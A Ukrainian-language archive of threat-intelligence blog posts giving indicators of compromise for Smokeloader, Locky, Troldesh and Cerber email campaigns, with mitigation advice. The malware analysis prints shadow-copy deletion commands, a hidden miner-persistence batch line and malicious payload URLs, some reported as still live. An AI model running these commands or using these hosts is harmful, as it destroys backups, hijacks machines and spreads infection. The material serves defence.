Tag Archive | WScript

IOC_smokeloader_081118

08/11/18 проходила розсилка #smokeloader

Схема:
email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0

# # #

Більше маркерів (чорновик звіту) за посиланням:

https://pastebin.com/JmthzrL4

Контрзаходи:

• Блокуйте WSH або трафік cscript/wscript
• Фільтруйте нестандартні архіви та скриптові файли
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

Advertisements

IOC_Locky_041017

Доброго дня, панове.

На протязі останніх днів було зафіксовано масові спроби доставки Locky Ransomware (розглядав тут і тут ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS та необфусковані VBS скрипти у оболонці 7z та Zip.

Схема атаки:

email > Attach (7z/Zip) > JS / VBS > 2-3 URL > GET > %temp%\random.exe

Маркери IOC:

f17e6d1e-3827-47da-b191-55e94e24c406

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (-)
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (+)

завантаження >

Filename UuhgwJfbwT3.exe
Size 576KiB (589824 bytes)
SHA256 b38ba4b2328342e46bdb396710161535870a1421819eae171f99a114a3d958a0

I_197975

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)
185.119.213.186 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

I_980998

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

New Doc 2017-10-02 – Page 3 -8402

86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)

New Doc 2017-10-02 – Page 3 -8692

66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw HTTP/1.1 (-)
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw HTTP/1.1 (+)

завантаження >

Filename wLoxrGw4.exe
Size 595KiB (608768 bytes)
SHA256 70d06bd4e6a91b60bc8515e327fa1f9fb7ac82125e3c8a06359b5bb3f96e48f3

свіжий, необфускований VBS, перевірки коду країни нема

Invoice505122638848637420994974

Plyask = Array("tecnigrafite.com/8etyfh3ni?","derainlay.info/p66/8etyfh3ni","securmailbox.it/8etyfh3ni?")
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

усі три поки активні

завантаження >

Filename zzXOPtNyW.exe
Size 606KiB (620544 bytes)
SHA256 5ccb49b3a3bb1cf0cbeaebf50ed30344e4b87f19ca2d6dad578d5210de904d65

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні!

js
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw
vbs
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

вже не активні

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz
86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa
66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_troldesh_ransom_220917

Доброго вечора, панове.

Сьогодні було зафіксовано спробу доставки різновиду Troldesh Ransomware.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Трохи аналітики:

  • Зловмисники комбінують зразок який я уже розбирав із методом доставки через OLE
  • Файл-приманка не містить макросів, натомість там обфускований JS у вигляді OLE об’єкту
  • По при примітивний підхід сама приманка (dropper) мала низький рейтинг на VT (6/59)
  • Обидві частини dropper та payload розповсюджуються із двох різних скомпрометованих сайтів зони AU
  • Зразок закріплюється в системі і шифрування починає із затримкою 10-15 хв
  • Основна частина (payload) замаскована під png файл
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються по GTI.

Схема атаки:

email > URL > DOCX > OLE > JS > WScript > URL > GET > %APPDATA%\Microsoft\Windows\Templates\random.exe

Маркери IOC:

Сам документ приманка розповсюджується із скомпрометованого серверу (досі активний!):

142.4.12.133  h11p://http://www.bajaparts.com.au/kvit_recepr_92217.docx

File Name kvit_recepr_92217.docx
SHA-256 Hash Identifier 35CE8815C0D78DDD58C651FC520D65343CF919388944683F693BA994AD7C57D9
File Size 47017 bytes
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document

При відкритті користувачу пропонують активувати два OLE об’єкти (два JS скрипти)

Якщо користувач запускає подвійним кліком один із них, він записується та оброблюється WSCript із %temp%

File Name Квитанция.js
SHA-256 Hash Identifier A6201F69711961EF02FBC1A584A65FCF7FFA431E57F4F9F8653F005F3F2961CF
File Size 50304 bytes

Його активація призводить до завантаження основної частини із скомпрометованого серверу (досі активний!):

27.121.64.61 h11p://www.papermillmedia.com.au GET /wp-includes/customize/copy_example_.png HTTP/1.1

у випадку успішного завантаження основне тіло записується процесом WSCript у каталог “%APPDATA%\Microsoft\Windows\Templates\939299.exe”

File Name copy_example.png            >>  939299.exe
SHA-256 Hash Identifier 1DCF33CE009B879CE5D5197904151DC32112476F84E50F808BF55E8C9EA2130D
File Size 1028608 bytes

Після запуску дублює своє тіло у C:\ProgramData\Windows\csrss.exe

Закріплюється через HKEY_USERS\SID\Software\Microsoft\Windows\CurrentVersion\Run\

Через 10-15 хв після активації розпочинає процес шифрування файлів, зашифровані файли отримують розширення .crypted000007

Цитата із вимог про викуп:

“Baши фaйлы были зашифрoваны.

Чтобы pасшифрoваmь uх, Вaм нeoбxодимо omправumь кoд:

85F93484188BBACD2983|839|6|8

нa элеkmрoнный адpec VladimirScherbinin1991@gmail.com”

Мережева активність скомпрометованої системи:

939299.exe 2192 TCP 127.0.0.1 49283 ESTABLISHED
939299.exe 2192 TCP 127.0.0.1 49282 ESTABLISHED
939299.exe 2192 TCP 194.109.206.212 443 ESTABLISHED
939299.exe 2192 TCP 131.188.40.189 443 ESTABLISHED
939299.exe 2192 TCP 94.31.53.203 443 ESTABLISHED
939299.exe 2192 TCP 89.233.27.241 443 ESTABLISHED
939299.exe 2192 TCP 89.223.27.241 443 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження документу з OLE можна було перервати через блокування OLE на шлюзах WEB та EMAIL
  2. Активацію OLE можна було заблокувати через параметри реєстру
  3. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  4. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  5. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

завантаження файлу-приманки (dropper)

142.4.12.133  h11p://www.bajaparts.com.au/kvit_recepr_92217.docx

завантаження основної частини (payload)

27.121.64.61  h11p://www.papermillmedia.com.au GET /wp-includes/customize/copy_example_.png HTTP/1.1'

трафік після запуску payload

194.109.206.212 443 ESTABLISHED
131.188.40.189 443 ESTABLISHED
94.31.53.203 443 ESTABLISHED
89.233.27.241 443 ESTABLISHED
89.223.27.241 443 ESTABLISHED

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блок запуску OLE об’єктів через параметри пакету MS Office (HKCU\Software\Microsoft\Office\<Office Version>\<Office application>\Security\PackagerPrompt)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_18Cerber-19Smokeloader

Доброго дня, панове.

Візьміть до уваги дані по двом розсилкам.

18го числа проходила розсилка VBS скриптів, які ініціювали завантаження та запуск Cerber Ransomware

19го числа (сьогодні зранку) проходила розсилка JS скриптів, які ініціювали завантаження та запуск Smokeloader

Рівень загрози по cerber – середній, по smokeloader – високий.

Для організацій, що прислухалися до моїх попередніх рекомендацій щодо обмежень операцій із скриптовими файлами – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload обох розсилок детектуються DAT & GTI.

Трохи аналітики:

  • Частина джерел досі активні (детальніше дивіться в блоці маркерів)
  • По сьогоднішній розсилці є скомпрометовані веб-ресурси українських організацій (ТОВ «РАДІОЛОГІЧНИЙ ЦЕНТР «СТАКС», Компания «VKmodule»)
  • Кампанія по cerber (18те) проходила через нелокалізовані листи
  • Кампанія по smokeloader проходила з локалізованими листами із зображеннями документів (паспорту)
  • Крім двох VBS, кожен із скриптів містить як мінімум два посилання (не одне)
  • Для обходу фільтрів застосовують обгортку у вигляді 7zip (не всі рішення підтримують сканування архівів цього формату)
  • У другому випадку застосували запуск із Робочого столу щоб обійти можливі політики щодо %temp%
  • Payload в обох випадках передається у відкритому вигляді (не кодований)

Схема атаки:

18/09 – VBS _ Cerber

email > attach (7z) > VBS >  WScript > URL > GET > %temp%\%random%.exe

19/09 – JS _ Smokeloader

email > attach (7z) > JS > WScript > URL > GET > %Userprofile%\Desktop\%random%.exe

 

Маркери IOC:

 

18/09 – VBS – Cerber

File Name 20488960477.vbs 
SHA-256 Hash Identifier E67C1156F7049F0C9C480109CEA8F5FC27527E3E10D874B2A94D228A13B56C30
File Size 9720 bytes
File Type ASCII text

намагається завантажити payload із

98.124.251.167 80 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1
File Name 9752714232.vbs
SHA-256 Hash Identifier E95808AA32993A842A9C8245FA23D760B72B651688510048112D97B3682AB2F1
File Size 9881 bytes
File Type ASCII text

намагається завантажити payload із

98.124.251.167 80 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1
File Name 32359538621.vbs

SHA-256 Hash Identifier E89F385EC88198DC7ABB9B6C57F64EC473469F0CD4D2B174A9996894561075E1

File Size 9740 bytes

File Type ASCII text

намагається завантажити payload із

149.56.223.252 80 HTTP saitis.eu GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1

File Name 2705466177.vbs
SHA-256 Hash Identifier 04F34C472657E1E5434DC119A54858490A7392BAD3F53699488E5C5F36F9D030
File Size 10020 bytes
File Type ASCII text

намагається завантажити payload із

85.95.237.29 80 HTTP yildizmakina74.com GET /87thiuh3gfDGS? HTTP/1.1
46.185.113.174 80 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1

File Name I_202505~1.vbs
SHA-256 Hash Identifier 5E364BA40816233DD82ABC039292F6B91696B04EDD8570F0CC04AF9322454E8C
File Size 11288 bytes
File Type ASCII text

намагається завантажити payload із

207.58.143.135 80 HTTP gabriellesrestaurant.com GET /GHFbfsalku65? HTTP/1.1
 

File Name I_442393~1.vbs
SHA-256 Hash Identifier 4061030F24622876509F3324CD0D2EEAF2F52FA86E880C905195ED4449F93109
File Size 11373 bytes
File Type ASCII text

намагається завантажити payload із

185.18.198.158 80 HTTP camerawind.com GET /GHFbfsalku65? HTTP/1.1

у випадку успішного завантаження в %temp% записується файл

File Name AciFyqRD.exe
SHA-256 Hash Identifier 3EBB3C50EA81E6897F130CD5582981CA6EE0A5432EBFE85FA522DC25FC462AAF
File Size 649216 bytes

– на тестових системах зразок шифрування не розпочав і після запуску дав команду на видалення себе через cmd

– – – –

19/09 – JS – Smokeloader




File Name труд_договор.js
SHA-256 Hash Identifier DDADB1A64C2A642DC481AFD65203240F225D67BE90ECFB15048F045B6C24FC84
File Size 21770 bytes
File Type ASCII text

активація скрипта приманки призводить до завантаження основного тіла із (додаткові адреси див. в блоці мережевих маркерів)

194.28.87.175 HTTP staks.com.ua GET /image/svhost.exe HTTP/1.1


File Name SVHOST.EXE
SHA-256 Hash Identifier 97B587AEF1FB6E51EFE1428CD6936430962C31590A7C01A8B9CF45B04C923734
File Size 268288 bytes

Яке записується та стартує із каталогу %Userprofile%\Desktop\random.exe

– дуже агресивний, після запуску припиняє роботу утиліт моніторингу

– інжектує себе у процес explorer.exe

– додає у автозавантаження через HCU\Run

– ініціює з’єднання із сервером контролю 47.89.252.198 HTTP poperediylimitkv.com POST /web/ HTTP/1.1

– блокує запуск утиліт моніторингу під обліковим записом жертви

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

18/09 – VBS – Cerber

завантаження основної частини (payload)

98.124.251.167 HTTP troyriser.com GET /87thiuh3gfDGS? HTTP/1.1 (видалено)
46.185.113.174 HTTP miliaraic.ru GET /p66/87thiuh3gfDGS HTTP/1.1 (файл досі присутній)
149.56.223.252 HTTP saitis.eu GET /87thiuh3gfDGS? HTTP/1.1 (видалено)
85.95.237.29 HTTP yildizmakina74.com GET /87thiuh3gfDGS? HTTP/1.1 (видалено)

одиночні скрипти

207.58.143.135 HTTP gabriellesrestaurant.com GET /GHFbfsalku65? HTTP/1.1 (видалено)
185.18.198.158 HTTP camerawind.com GET /GHFbfsalku65? HTTP/1.1 (видалено)

19/09 – JS – Smokeloader

завантаження основної частини (payload)

194.28.87.175 HTTP staks.com.ua GET /image/svhost.exe HTTP/1.1 (файл досі присутній)
212.26.135.68 HTTP vkmodule.com.ua GET /ppt/svhost.exe HTTP/1.1 (файл досі присутній)
47.89.252.198 HTTP poperediylimitkv.com GET /hiloddfvnc/svc.exe HTTP/1.1 (файл досі присутній)

комунікація із контрольним центром (С2)

47.89.252.198 HTTP poperediylimitkv.com POST /web/ HTTP/1.1  (активний обмін даними зі скомпрометованої системи)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Ransom_troldesh_050917

Доброго дня, панове.

За даними @malwrhunterteam Вчора було зафіксовано спробу доставки Ransomware типу TorrentLocker (shade/troldesh,).

ransomnote_filename: READMExx.txt

ransomnote_email: VladimirScherbinin1991[@]gmail.com

ransomnote_url: h11p://cryptsen7fo43rr6.onion.cab/

encrypted files are <base64>.<ID>.crypted000007

Доставка через JS скрипт (Nemucod) і завантаження основного тіла через WScript.

Доставку забезпечує скомпрометований сайт h11p://contrast.com.ua (194.24.182.138)

Сайт містить обидві частини – dropper та payload:

Важливо – станом на 12:30 файли досі доступні, судячи з дати модифікації були опубліковані ще 5/09/17.

Рівень загрози – середній.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI.

Схема атаки:

email > attach (ZIP) > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

або

email > URL > GET > ZIP > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

Маркери IOC:

File Name ✉ запрашиваемая Вами форма.js
SHA-256 Hash Identifier C3A4433120AB94AC0619670247A0D41B2051E2B9EA897884C323F62ABC872000
File Size 49240 bytes
File Type ASCII text

Запуск скрипта-приманки ініціює завантаження основного тіла:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg

Основне тіло являє собою додаток із розширенням .jpg

File Name donckihot.jpg
SHA-256 Hash Identifier 9B6667E567A5D2B86082EC3048A2F08D8F081F09049B2F2A932CFD803EDBC063
File Size 1027072 bytes

Яке записується та стартує із каталогу

%Username%\AppData\Roaming\Microsoft\Windows\Templates\%random%.exe

Копіює своє тіло у c:\programdata\windows\csrss.exe

Зразок проводить перевірку наявності та видалення існуючих тіньових копій:

C:\Windows\system32\vssadmin.exe List Shadows 
C:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet

Додає себе у автозавантаження

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Client Server Runtime Subsystem c:\programdata\windows\csrss.exe

Ініціює зміну кодової сторінки

C:\Windows\system32\cmd.exe > chcp

Завантажує додатковий модуль у %tmp% та запускає його

“C:\tmp\749406EA.exe”

File Name 749406EA.exe
SHA-256 Hash Identifier CAAFBAC10D50D12F8852A9FD22DA3EA468C5658DBBEA61827EE6D6AEF7AF3D65
File Size 12407808 bytes

Який у свою чергу паралельно з процесом шифрування запускає на системі Bitcoin miner

File Name nheqminer.exe
SHA-256 Hash Identifier 8787D5D5E0C52183B60769DCA03087593870356AF632ADCABFFC2ACDFADBBD3A
File Size 643072 bytes
C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE  -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1

Для закріплення майнера при перезавантаженні в автозапуск додається bat:

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Command Line Support c:\programdata\syswow64\qw84q.cmd

Зміст bat файлу:

echo CreateObject("Wscript.Shell").Run "" ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/JQZ3Cw.vbs" && start /WAIT wscript.exe "%TEMP%/JQZ3Cw.vbs" "C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1" && del "%TEMP%\JQZ3Cw.vbs"

Після шифрування мережева активність скомпрометованої системи виглядає так:

645030.exe 200 TCP 127.0.0.1 49215 127.0.0.1 49216 ESTABLISHED 
645030.exe 200 TCP 127.0.0.1 49216 127.0.0.1 49215 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49230 194.109.206.212 443 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49231 171.25.193.9 80 CLOSE_WAIT
645030.exe 200 TCP 10.0.2.15 49232 192.42.115.102 9004 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49233 62.210.244.146 9001 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49234 89.163.224.70 9001 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49254 127.0.0.1 49255 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49255 127.0.0.1 49254 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49257 208.83.223.34 80 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49258 193.23.244.244 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49259 85.214.62.48 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49260 51.15.48.254 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49261 92.62.46.190 443 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49262 127.0.0.1 62779 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 62779 127.0.0.1 49262 ESTABLISHED
NHEQMI~1.EXE 224 TCP 10.0.2.15 49256 94.23.20.210 3333 ESTABLISHED

Що можна було зробити аби уникнути шифрування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення .tmp та .exe файлів у каталозі профілю та %tmp% якщо не стандартний шлях (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg
194.109.206.212:443
171.25.193.9:80
192.42.115.102:9004
62.210.244.146:9001
89.163.224.70:9001
208.83.223.34:80
193.23.244.244:443
85.214.62.48:443
51.15.48.254:443
92.62.46.190:443
94.23.20.210:3333

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Windows Script Host або як перестати боятися скриптів

Всім привіт.
Останнім часом почастішали спроби доставки ransomware та троянського шкідливого коду через приманки у вигляді скриптів (.js*, .vbs, .wsf)
І хоча такий підхід абсолютно не новий (перший раз мені JS потрапив до рук 05/11/2015) але люди чомусь досі клікають і запускають, тому опишу прості прямолінійні варіанти як можна убезпечити організацію від зараження через цей механізм. Але давайте про все по порядку.
Нижче ви можете бачити зразки фішингових листів що ілюструють два типових способи доставки: приєднання та посилання:
Наша команда не одноразово наголошувала про необхідність блокування таких файлів по каналам web та email а також заборону їх створення у %AppData%.
Для тих, у кого поки немає комплексного захисту із білими списками та пісочницею, а також для тих, хто ігнорує застосування правил Access Protection у VSE/ENS пропоную на вибір два простих методи захисту від зараження через скрипти:
#1 Блокування доступу до мережі для процесу WScript
cmd від імені Адміністратора

netsh advfirewall firewall add rule name="_BLK_WScript" dir=out action=block program="C:\Windows\System32\wscript.exe"

* варто зазначити, що для повного захисту потрібно також створити схоже правило для консольного процесу cscript.exe
Результат роботи правила – при спробі запустити скрипт-приманку користувач буде отримувати помилку, а основна частина не буде завантажена:
#2 Деактивація механізму обробки скриптів
regedit від імені Адміністратора
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings
Створити параметр типу “DWORD” з іменем “Enabled” і значенням “0
Результат роботи цього методу проілюстровано на знімку екрану вище – при спробі запуску будь якої скриптової приманки користувач отримуватиме помилку.
PS
Важливо зазначити, що дані контрзаходи базуються на вбудованих можливостях ОС і працюють одразу без перезавантаження.
І так, я в курсі, що такий підхід може спричинити проблеми в роботі програм, які залежать від скриптів, але в більшості випадків пересічний користувач може жити з виключеним WSH.
Використання описаних вище способів може бути тимчасово припинено у разі необхідності.
Але варто усвідомлювати, що навіть застосування одного із цих методів не є повноцінним захистом від сучасних масових та цільових атак.
Варто міркувати над впровадженням хочаби Access Protection або ж повного комплексу MAR, ATP =DAC + ATD
Будьте уважні та обережні.
VR